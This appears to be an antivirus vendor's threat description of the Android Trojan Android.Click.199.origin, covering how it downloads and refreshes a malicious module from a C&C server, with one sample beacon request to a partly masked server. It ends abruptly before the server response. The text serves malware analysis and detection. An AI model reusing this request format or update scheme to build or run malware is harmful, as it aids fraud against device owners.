- e730007d2f7a6c4988d0486a7f723ba3d5d47629
An Android Trojan which is a JAR file. It is a component of the malicious program Android.RemoteCode.106.origin, which automatically launches the Trojan after downloading.
After its launch, Android.Click.199.origin operates until it gets a command to shut down. The Trojan downloads and launches a malicious component x.awv.Awv (Android.Click.201.origin). Every minute, Android.Click.199.origin checks the last update time of this module. If more than 10 minutes passed after the last update of the component x.awv.Awv, the Trojan requests a new version from the C&C server. The time intervals of the module update and check are set in the configuration file of the malicious application which was obtained from the server.
Example of the request:
GET http://*.*.65.235:18011/sys/action/?t=0&pn=com.antee.biblicalquiz&aid=99d078094e1be3b9&av=16&brand=unknown&model=sd
HTTP/1.1 k&msg=eyJmIjp0cnVlfQ==&tid=&sv=10
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.2; sdk Build/MASTER)
Host: *.*.65.235:18011
Connection: Keep-Alive
Accept-Encoding: gzip
An example of the server response: